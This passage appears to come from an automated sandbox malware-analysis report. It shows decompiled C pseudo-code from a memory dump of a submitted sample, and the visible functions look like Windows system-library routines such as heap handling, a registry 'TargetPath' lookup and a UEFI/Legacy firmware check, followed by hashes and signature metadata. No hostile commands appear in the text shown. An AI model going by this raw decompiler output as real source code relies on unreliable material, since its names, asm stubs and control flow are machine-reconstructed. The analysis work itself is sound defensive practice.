				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E018ABBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E018ABCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E018AAFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E01829730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E018AA80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E018AA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E01829730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E018AA80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E018AA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E01802280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E017FB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E017FFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E01807D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0189FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                                        0x018ae547
                                                        0x018ae549
                                                        0x018ae54f
                                                        0x018ae553
                                                        0x018ae557
                                                        0x018ae55a
                                                        0x018ae55c
                                                        0x018ae55f
                                                        0x018ae561
                                                        0x018ae567
                                                        0x018ae56b
                                                        0x018ae7e2
                                                        0x00000000
                                                        0x018ae571
                                                        0x018ae575
                                                        0x018ae577
                                                        0x018ae57b
                                                        0x018ae57c
                                                        0x018ae57d
                                                        0x018ae57e
                                                        0x018ae57f
                                                        0x018ae588
                                                        0x018ae58f
                                                        0x018ae591
                                                        0x018ae592
                                                        0x018ae592
                                                        0x018ae596
                                                        0x018ae59e
                                                        0x018ae5a0
                                                        0x018ae5a6
                                                        0x018ae61d
                                                        0x018ae61d
                                                        0x018ae621
                                                        0x018ae623
                                                        0x018ae630
                                                        0x018ae630
                                                        0x018ae7e6
                                                        0x018ae7eb
                                                        0x018ae7ed
                                                        0x018ae7f4
                                                        0x018ae7fa
                                                        0x018ae7ff
                                                        0x018ae7ff
                                                        0x018ae80a
                                                        0x018ae812
                                                        0x018ae812
                                                        0x018ae5ab
                                                        0x018ae5b4
                                                        0x018ae5b9
                                                        0x018ae5be
                                                        0x018ae5c0
                                                        0x018ae5c2
                                                        0x018ae5c8
                                                        0x018ae5c9
                                                        0x018ae5cb
                                                        0x018ae5cc
                                                        0x018ae5d5
                                                        0x018ae5e4
                                                        0x018ae5f1
                                                        0x018ae5f8
                                                        0x018ae5f8
                                                        0x018ae5d5
                                                        0x018ae602
                                                        0x018ae616
                                                        0x018ae63d
                                                        0x018ae644
                                                        0x018ae64d
                                                        0x018ae652
                                                        0x018ae657
                                                        0x018ae659
                                                        0x018ae65b
                                                        0x018ae661
                                                        0x018ae662
                                                        0x018ae664
                                                        0x018ae665
                                                        0x018ae66e
                                                        0x018ae67d
                                                        0x018ae68a
                                                        0x018ae691
                                                        0x018ae691
                                                        0x018ae66e
                                                        0x018ae6b0
                                                        0x00000000
                                                        0x018ae6b6
                                                        0x018ae6bd
                                                        0x018ae6c7
                                                        0x018ae6d7
                                                        0x018ae6d9
                                                        0x018ae6db
                                                        0x018ae6de
                                                        0x018ae6e3
                                                        0x018ae6f3
                                                        0x018ae6fc
                                                        0x018ae700
                                                        0x018ae700
                                                        0x018ae704
                                                        0x018ae70a
                                                        0x018ae70a
                                                        0x018ae713
                                                        0x018ae716
                                                        0x018ae719
                                                        0x018ae720
                                                        0x018ae761
                                                        0x018ae76b
                                                        0x018ae774
                                                        0x018ae77a
                                                        0x018ae77a
                                                        0x018ae78a
                                                        0x018ae791
                                                        0x018ae799
                                                        0x018ae79b
                                                        0x018ae79f
                                                        0x018ae7aa
                                                        0x018ae7c0
                                                        0x018ae7ac
                                                        0x018ae7b2
                                                        0x018ae7b9
                                                        0x018ae7b9
                                                        0x018ae7c7
                                                        0x018ae806
                                                        0x00000000
                                                        0x018ae7c9
                                                        0x018ae7d1
                                                        0x018ae7d8
                                                        0x00000000
                                                        0x018ae7d8
                                                        0x00000000
                                                        0x00000000
                                                        0x018ae722
                                                        0x018ae72e
                                                        0x018ae748
                                                        0x018ae74c
                                                        0x018ae754
                                                        0x018ae756
                                                        0x018ae75c
                                                        0x018ae75c
                                                        0x00000000
                                                        0x018ae75c
                                                        0x018ae758
                                                        0x018ae758
                                                        0x00000000
                                                        0x018ae758
                                                        0x018ae750
                                                        0x00000000
                                                        0x00000000
                                                        0x018ae752
                                                        0x00000000
                                                        0x018ae752
                                                        0x018ae730
                                                        0x018ae735
                                                        0x018ae73d
                                                        0x018ae73f
                                                        0x00000000
                                                        0x00000000
                                                        0x018ae741
                                                        0x018ae741
                                                        0x00000000
                                                        0x018ae741
                                                        0x018ae739
                                                        0x00000000
                                                        0x00000000
                                                        0x018ae73b
                                                        0x00000000
                                                        0x018ae73b
                                                        0x018ae722
                                                        0x018ae720
                                                        0x018ae6b0
                                                        0x018ae618
                                                        0x00000000
                                                        0x018ae618

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: `$`
                                                        • API String ID: 0-197956300
                                                        • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                        • Instruction ID: b6b294e8ea49f80278a0cc5cffc8a6a2b0b0596c64c9e09e8efe6b2969a9938e
                                                        • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                        • Instruction Fuzzy Hash: F2919F316043469FF724CE29C841B1BBBE5AF84714F548D2DFA99CB280E774EA04CB52
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 017E6F60 Relevance: 2.7, Strings: 2, Instructions: 235COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 87%
                                                        			E017E6F60(intOrPtr _a4, char* _a8, intOrPtr* _a12, signed int _a16, intOrPtr _a20, unsigned int _a24, unsigned int* _a28) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				short _v48;
				char _v52;
				unsigned int _v56;
				intOrPtr _v60;
				void* _v68;
				signed int _t72;
				signed int _t81;
				unsigned int* _t98;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t109;
				unsigned int* _t110;
				short _t113;
				unsigned int _t115;
				unsigned int _t117;
				void* _t119;
				unsigned int _t120;
				intOrPtr* _t121;
				intOrPtr* _t124;
				intOrPtr* _t126;
				unsigned int _t129;
				intOrPtr* _t130;
				intOrPtr* _t131;
				short _t134;
				signed int _t137;
				void* _t139;
				void* _t140;
				signed int _t141;
				signed int _t142;
				void* _t144;

				_t144 = (_t142 & 0xfffffff8) - 0x34;
				_t72 = _a16;
				_t113 = 0;
				_v44 = 0;
				_v52 = 0;
				_v48 = 0;
				_t134 = 0;
				if(_t72 != 0) {
					if(_t72 == 1) {
						goto L1;
					}
					_t81 = 0xc00000f1;
					L14:
					return _t81;
				}
				L1:
				_v28 = 0x18;
				_v20 = 0x17c16a8 + _t72 * 8;
				_push( &_v28);
				_push(0x20019);
				_v24 = _t113;
				_push( &_v52);
				_v16 = 0x40;
				_v12 = _t113;
				_v8 = _t113;
				_t137 = E01829600();
				if(_t137 != 0xc0000034) {
					if(_t137 < 0) {
						L10:
						if(_v52 != 0) {
							_push(_v52);
							E018295D0();
						}
						if(_v48 != 0) {
							_push(_v48);
							E018295D0();
						}
						if(_t134 != 0) {
							L018077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t113, _t134);
						}
						_t81 = _t137;
						goto L14;
					}
					E0182BB40(_t119,  &_v36, _a4);
					_v32 = _v60;
					_v28 =  &_v44;
					_push( &_v36);
					_push(0x20019);
					_v36 = 0x18;
					_push( &_v56);
					_v24 = 0x40;
					_v20 = _t113;
					_v16 = _t113;
					_t137 = E01829600();
					if(_t137 == 0xc0000034) {
						goto L2;
					}
					L20:
					if(_t137 < 0) {
						goto L10;
					}
					_t89 = _a8;
					if(_a8 == 0) {
						_t89 = L"TargetPath";
					}
					E0182BB40(_t119,  &_v36, _t89);
					_t115 = _a24;
					_t139 = _t115 + 0x10;
					if(_t139 >= _t115) {
						_t134 = E01804620(_t119,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t139);
						if(_t134 != 0) {
							_push( &_v56);
							_push(_t139);
							_push(_t134);
							_push(2);
							_push( &_v36);
							_push(_v48);
							_t137 = E01829650();
							if(_t137 < 0) {
								if(_t137 != 0x80000005) {
									goto L51;
								}
								L32:
								_t120 =  *(_t134 + 8);
								_t49 = _t134 + 0xc; // 0xc
								_t131 = _t49;
								_v56 = _t120;
								if(_t137 < 0) {
									L47:
									_t98 = _a28;
									if(_t98 != 0) {
										 *_t98 = _t120;
									}
									if(_t137 >= 0) {
										E0182F3E0(_a20, _t131, _t120);
									}
									goto L51;
								}
								_t117 = _a24;
								if( *((intOrPtr*)(_t131 + (_t120 >> 1) * 2 - 2)) != 0) {
									_t120 = _t120 + 2;
									_v56 = _t120;
									if(_t117 < _t120) {
										_t137 = 0x80000005;
									} else {
										 *((short*)(_t131 + (_t120 >> 1) * 2 - 2)) = 0;
										_t120 = _v56;
									}
								}
								if(_t137 < 0 ||  *((intOrPtr*)(_t134 + 4)) != 2) {
									goto L47;
								} else {
									_t121 = _t131;
									_t61 = _t121 + 2; // 0xe
									_t140 = _t61;
									do {
										_t102 =  *_t121;
										_t121 = _t121 + 2;
									} while (_t102 != _v44);
									_t113 = 0;
									_t137 = E01812440(0, _t131, _t121 - _t140 >> 1, _a20, _t117 >> 1, _t144 + 0x1c);
									if(_t137 >= 0 || _t137 == 0xc0000023) {
										_t124 = _a28;
										if(_t124 != 0) {
											 *_t124 =  *((intOrPtr*)(_t144 + 0x1c)) +  *((intOrPtr*)(_t144 + 0x1c));
										}
										if(_t137 == 0xc0000023) {
											_t137 = 0x80000005;
										}
									}
									goto L10;
								}
							}
							if( *((intOrPtr*)(_t134 + 4)) == 1 ||  *((intOrPtr*)(_t134 + 4)) == 2) {
								goto L32;
							} else {
								_t137 = 0xc0000024;
								goto L51;
							}
						}
						_t137 = 0xc0000017;
						goto L51;
					} else {
						_t137 = 0xc0000095;
						L51:
						_t113 = 0;
						goto L10;
					}
				}
				L2:
				_t130 = _a12;
				if(_t130 == 0) {
					goto L20;
				} else {
					_t126 = _t130;
					_t141 = _t126 + 2;
					goto L4;
					L4:
					_t108 =  *_t126;
					_t126 = _t126 + 2;
					if(_t108 != _t113) {
						goto L4;
					} else {
						_t109 = (_t126 - _t141 >> 1) + 1;
						_t129 = _t109 + _t109;
						_v56 = _t129;
						if(_t129 < _t109) {
							_t137 = 0xc0000095;
						} else {
							_t110 = _a28;
							asm("sbb esi, esi");
							_t137 = _t141 & 0x80000005;
							if(_t110 != 0) {
								 *_t110 = _t129;
							}
							if(_t129 <= _a24) {
								E0182F3E0(_a20, _t130, _t129);
							}
						}
						goto L10;
					}
				}
			}










































                                                        0x017e6f68
                                                        0x017e6f6b
                                                        0x017e6f6f
                                                        0x017e6f71
                                                        0x017e6f75
                                                        0x017e6f79
                                                        0x017e6f7f
                                                        0x017e6f83
                                                        0x018420d3
                                                        0x00000000
                                                        0x00000000
                                                        0x018420d9
                                                        0x017e7045
                                                        0x017e704b
                                                        0x017e704b
                                                        0x017e6f89
                                                        0x017e6f90
                                                        0x017e6f98
                                                        0x017e6fa0
                                                        0x017e6fa1
                                                        0x017e6faa
                                                        0x017e6fae
                                                        0x017e6faf
                                                        0x017e6fb7
                                                        0x017e6fbb
                                                        0x017e6fc4
                                                        0x017e6fcc
                                                        0x018420e5
                                                        0x017e7025
                                                        0x017e702a
                                                        0x018422a1
                                                        0x018422a5
                                                        0x018422a5
                                                        0x017e7035
                                                        0x018422af
                                                        0x018422b3
                                                        0x018422b3
                                                        0x017e703d
                                                        0x018422c8
                                                        0x018422c8
                                                        0x017e7043
                                                        0x00000000
                                                        0x017e7043
                                                        0x018420f3
                                                        0x018420fc
                                                        0x01842104
                                                        0x0184210c
                                                        0x0184210d
                                                        0x01842116
                                                        0x0184211e
                                                        0x0184211f
                                                        0x01842127
                                                        0x0184212b
                                                        0x01842134
                                                        0x0184213c
                                                        0x00000000
                                                        0x00000000
                                                        0x01842142
                                                        0x01842144
                                                        0x00000000
                                                        0x00000000
                                                        0x0184214a
                                                        0x0184214f
                                                        0x01842151
                                                        0x01842151
                                                        0x0184215c
                                                        0x01842161
                                                        0x01842164
                                                        0x01842169
                                                        0x01842187
                                                        0x0184218b
                                                        0x0184219b
                                                        0x0184219c
                                                        0x0184219d
                                                        0x0184219e
                                                        0x018421a4
                                                        0x018421a5
                                                        0x018421ae
                                                        0x018421b2
                                                        0x018421d0
                                                        0x00000000
                                                        0x00000000
                                                        0x018421d6
                                                        0x018421d6
                                                        0x018421d9
                                                        0x018421d9
                                                        0x018421dc
                                                        0x018421e2
                                                        0x01842280
                                                        0x01842280
                                                        0x01842285
                                                        0x01842287
                                                        0x01842287
                                                        0x0184228b
                                                        0x01842292
                                                        0x01842297
                                                        0x00000000
                                                        0x0184228b
                                                        0x018421f3
                                                        0x018421f6
                                                        0x018421f8
                                                        0x018421fb
                                                        0x01842201
                                                        0x01842212
                                                        0x01842203
                                                        0x01842207
                                                        0x0184220c
                                                        0x0184220c
                                                        0x01842201
                                                        0x01842219
                                                        0x00000000
                                                        0x01842221
                                                        0x01842221
                                                        0x01842223
                                                        0x01842223
                                                        0x01842226
                                                        0x01842226
                                                        0x01842229
                                                        0x0184222c
                                                        0x01842240
                                                        0x0184224c
                                                        0x01842255
                                                        0x0184225f
                                                        0x01842264
                                                        0x0184226c
                                                        0x0184226c
                                                        0x01842270
                                                        0x01842276
                                                        0x01842276
                                                        0x01842270
                                                        0x00000000
                                                        0x01842255
                                                        0x01842219
                                                        0x018421b8
                                                        0x00000000
                                                        0x018421c0
                                                        0x018421c0
                                                        0x00000000
                                                        0x018421c0
                                                        0x018421b8
                                                        0x0184218d
                                                        0x00000000
                                                        0x0184216b
                                                        0x0184216b
                                                        0x0184229a
                                                        0x0184229a
                                                        0x00000000
                                                        0x0184229a
                                                        0x01842169
                                                        0x017e6fd2
                                                        0x017e6fd2
                                                        0x017e6fd7
                                                        0x00000000
                                                        0x017e6fdd
                                                        0x017e6fdd
                                                        0x017e6fdf
                                                        0x017e6fdf
                                                        0x017e6fe2
                                                        0x017e6fe2
                                                        0x017e6fe5
                                                        0x017e6feb
                                                        0x00000000
                                                        0x017e6fed
                                                        0x017e6ff1
                                                        0x017e6ff4
                                                        0x017e6ff7
                                                        0x017e6ffd
                                                        0x017e704e
                                                        0x017e6fff
                                                        0x017e7002
                                                        0x017e7005
                                                        0x017e7007
                                                        0x017e700f
                                                        0x017e7011
                                                        0x017e7011
                                                        0x017e7016
                                                        0x017e701d
                                                        0x017e7022
                                                        0x017e7016
                                                        0x00000000
                                                        0x017e6ffd
                                                        0x017e6feb

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$TargetPath
                                                        • API String ID: 0-4164548946
                                                        • Opcode ID: 406827210a6c0f704543ca89b4f4b38c39ec81f593e23c41cb84723c68a7f56e
                                                        • Instruction ID: 85d70a317ffe6ffa22473480fe23ac42dea3cb121c9fcfdc30867f1eb0eee651
                                                        • Opcode Fuzzy Hash: 406827210a6c0f704543ca89b4f4b38c39ec81f593e23c41cb84723c68a7f56e
                                                        • Instruction Fuzzy Hash: B481EF7290832A9FD725CE18D884A6BFBE5BB88314F01456DFA45D7201EB30EE45CB92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 018651BE Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 77%
                                                        			E018651BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x18c05f0);
				E0183D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E017FEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E018653CA(0);
						return E0183D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0182F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E01803690(1, _t117, 0x17c1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0182AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = E01804620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0182AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0186500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E01829860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                        0x018651be
                                                        0x018651c3
                                                        0x018651c8
                                                        0x018651cd
                                                        0x018651d0
                                                        0x018651d3
                                                        0x018651d8
                                                        0x018651db
                                                        0x018651de
                                                        0x018651e0
                                                        0x018651e3
                                                        0x018651e6
                                                        0x018651e8
                                                        0x01865342
                                                        0x01865351
                                                        0x01865356
                                                        0x0186535a
                                                        0x01865360
                                                        0x01865363
                                                        0x01865366
                                                        0x01865369
                                                        0x01865369
                                                        0x0186536b
                                                        0x0186536b
                                                        0x01865370
                                                        0x018653a3
                                                        0x018653a4
                                                        0x018653a6
                                                        0x018653ab
                                                        0x018653ab
                                                        0x018653ae
                                                        0x018653ae
                                                        0x018653b5
                                                        0x018653bf
                                                        0x018653bf
                                                        0x01865375
                                                        0x01865396
                                                        0x018653a0
                                                        0x018653a0
                                                        0x00000000
                                                        0x01865396
                                                        0x01865377
                                                        0x01865379
                                                        0x0186537f
                                                        0x0186538c
                                                        0x01865390
                                                        0x00000000
                                                        0x01865390
                                                        0x018651ee
                                                        0x018651f1
                                                        0x01865301
                                                        0x01865310
                                                        0x01865315
                                                        0x01865318
                                                        0x0186531b
                                                        0x01865320
                                                        0x0186532e
                                                        0x01865331
                                                        0x00000000
                                                        0x01865331
                                                        0x01865328
                                                        0x01865329
                                                        0x00000000
                                                        0x01865329
                                                        0x018651fa
                                                        0x01865235
                                                        0x01865236
                                                        0x01865239
                                                        0x0186523f
                                                        0x01865240
                                                        0x01865241
                                                        0x01865242
                                                        0x01865246
                                                        0x01865247
                                                        0x0186524e
                                                        0x01865251
                                                        0x01865267
                                                        0x01865269
                                                        0x0186526e
                                                        0x0186527d
                                                        0x0186527e
                                                        0x01865281
                                                        0x01865282
                                                        0x01865287
                                                        0x01865288
                                                        0x0186528a
                                                        0x0186528f
                                                        0x01865294
                                                        0x00000000
                                                        0x00000000
                                                        0x0186529a
                                                        0x0186529c
                                                        0x0186529e
                                                        0x0186529e
                                                        0x018652a4
                                                        0x018652b0
                                                        0x00000000
                                                        0x00000000
                                                        0x018652ba
                                                        0x018652bc
                                                        0x018652bc
                                                        0x018652d4
                                                        0x018652d9
                                                        0x018652dc
                                                        0x018652e1
                                                        0x00000000
                                                        0x00000000
                                                        0x018652e7
                                                        0x018652f4
                                                        0x00000000
                                                        0x018652f4
                                                        0x01865270
                                                        0x00000000
                                                        0x01865270
                                                        0x018651fc
                                                        0x018651fd
                                                        0x01865202
                                                        0x01865203
                                                        0x01865205
                                                        0x0186520a
                                                        0x0186520f
                                                        0x00000000
                                                        0x00000000
                                                        0x0186521b
                                                        0x01865226
                                                        0x0186522b
                                                        0x0186521d
                                                        0x0186521d
                                                        0x01865222
                                                        0x01865222
                                                        0x0186522d
                                                        0x00000000

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID: Legacy$UEFI
                                                        • API String ID: 2994545307-634100481
                                                        • Opcode ID: c3b029df467f6177528e7dd8150de89685af67a5cc621bad81c5034b8bacc372
                                                        • Instruction ID: 0e198f08256704cd14bb016f81c92da5e9eabeed8ea05fbfc8fec3bb2530dd4f
                                                        • Opcode Fuzzy Hash: c3b029df467f6177528e7dd8150de89685af67a5cc621bad81c5034b8bacc372
                                                        • Instruction Fuzzy Hash: 9A518CB1E006099FDB25DFA8C980AAEBBF8FF48B44F14402DE659EB251D670DA40CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 017E4439 Relevance: 2.6, Strings: 2, Instructions: 129COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 68%
                                                        			E017E4439(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				signed int _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				signed int _v72;
				intOrPtr _v76;
				signed int _v84;
				signed int _v88;
				char _v92;
				signed int _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t64;
				signed int _t68;
				intOrPtr* _t72;
				signed int _t74;
				void* _t77;
				signed int _t83;
				signed int _t84;

				_t79 = __edx;
				_t54 =  *0x18dd360 ^ _t84;
				_v8 =  *0x18dd360 ^ _t84;
				_t82 = __ecx;
				_v96 = __edx;
